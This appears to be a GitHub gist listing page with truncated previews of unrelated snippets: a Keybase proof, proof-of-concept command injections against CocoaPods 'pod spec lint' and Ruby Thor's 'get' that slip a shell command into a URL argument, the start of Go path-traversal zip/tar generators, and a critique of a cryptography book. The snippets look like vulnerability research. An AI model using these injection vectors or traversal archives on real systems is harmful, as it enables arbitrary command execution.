I hereby claim:
- I am ecneladis on github.
- I am ecneladis (https://keybase.io/ecneladis) on keybase.
- I have a public key ASA-QJvmS7xazTLNCuqXhhaFp8-904eA3dtM89QLwfrY1wo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
# https://github.com/CocoaPods/CocoaPods/blob/cae98c5386f7d80d6fe065c3f081ce130628151a/lib/cocoapods/command/spec/lint.rb#L100-L107 | |
pod spec lint "|touch /tmp/test;\nhttps://url.co" |
package main | |
import ( | |
"archive/zip" | |
"os" | |
"log" | |
) | |
func main() { | |
f, err := os.Create("traversal.zip") |
package main | |
import ( | |
"archive/tar" | |
"os" | |
"log" | |
) | |
func main() { | |
f, err := os.Create("traversal.tar") |
from scapy.all import * | |
import unicodedata | |
import sys, getopt | |
import time, datetime | |
import argparse | |
import socket | |
import fcntl | |
import struct | |
import threading |
A checklist for designing and developing internet scale services, inspired by James Hamilton's 2007 paper "On Desgining and Deploying Internet-Scale Services."
Let's have some command-line fun with curl, [jq][1], and the [new GitHub Search API][2].
Today we're looking for:
Wow. I've now read the whole book and much of the supporting code. I'm not a fan, and recommend against relying on it. Here's a laundry list of concerns:
The teaching method the book uses is badly flawed. The book's strategy is to start simple and build to complexity, which makes sense if you're teaching algebra but not if you're teaching heart surgery. The result is that each chapter culminates with the implementation of a system that is grievously insecure. Little warning is given of this, apart from allusions to future chapters improving the system. For instance, Chapter 2 closes with a chat system that uses AES-CBC without an authenticator.
The book is full of idiosyncratic recommendations. For instance, AES-CBC requires a padding scheme. There is a standard padding scheme. The book purports to present it, but instead of PKCS7, it presents 80h+00h..00h.
At one point about 1/3rd of the way through the book, it suggests using a SHA256 hash of the plaintext as an authenticator for a message. Thi
#!/usr/bin/env ruby | |
require 'thor' | |
class CLI < Thor | |
include Thor::Actions | |
desc "cmd_exec", "cmd_exec poc" | |
def cmd_exec() | |
get "|uname -a > cmd_exec_test;\nhttps://gist.github.com", "/tmp/dsadas" |